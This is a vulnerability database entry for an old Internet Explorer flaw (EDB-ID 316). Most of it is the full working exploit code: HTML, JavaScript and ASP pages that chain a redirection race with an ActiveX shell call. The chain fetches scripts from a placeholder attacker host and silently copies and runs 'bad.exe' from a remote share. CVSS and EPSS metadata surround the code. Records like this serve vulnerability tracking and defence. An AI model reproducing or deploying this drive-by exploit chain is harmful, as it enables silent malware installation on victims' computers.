Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 316
Publication date : 2004-07-12 22h00 +00:00
Author : Ferruh Mavituna
EDB Verified : Yes
----------------------------------------------------- default.htm -------------------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>
<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000\;dialogLeft:-1000\;dialogHeight:1\;dialogWidth:1\;").
location="vbscript:\"<SCRIPT SRC='http://IPADDRESS/shellscript_loader.js'><\/script>\"";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.asp" style=display:none;></IFRAME>');
</script>
</body>
</html>
--------------------------------------------------------- md.htm ---------------------------------------------------------
<SCRIPT language="javascript">
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCRIPT>
--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://IPADDRESS/shellscript.js'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>
var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe";var wF="%windir%\\\\_tmp.exe";var
o=new ActiveXObject("wscript.shell");var e="%comspec% /c copy "+rF+" "+wF;var err=o.Run(e,0,true);if(err==0)
o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp ----------------------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next
Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
# milw0rm.com [2004-07-13]
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version *
Microsoft>>Internet_explorer >> Version 5.01
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 6.0
References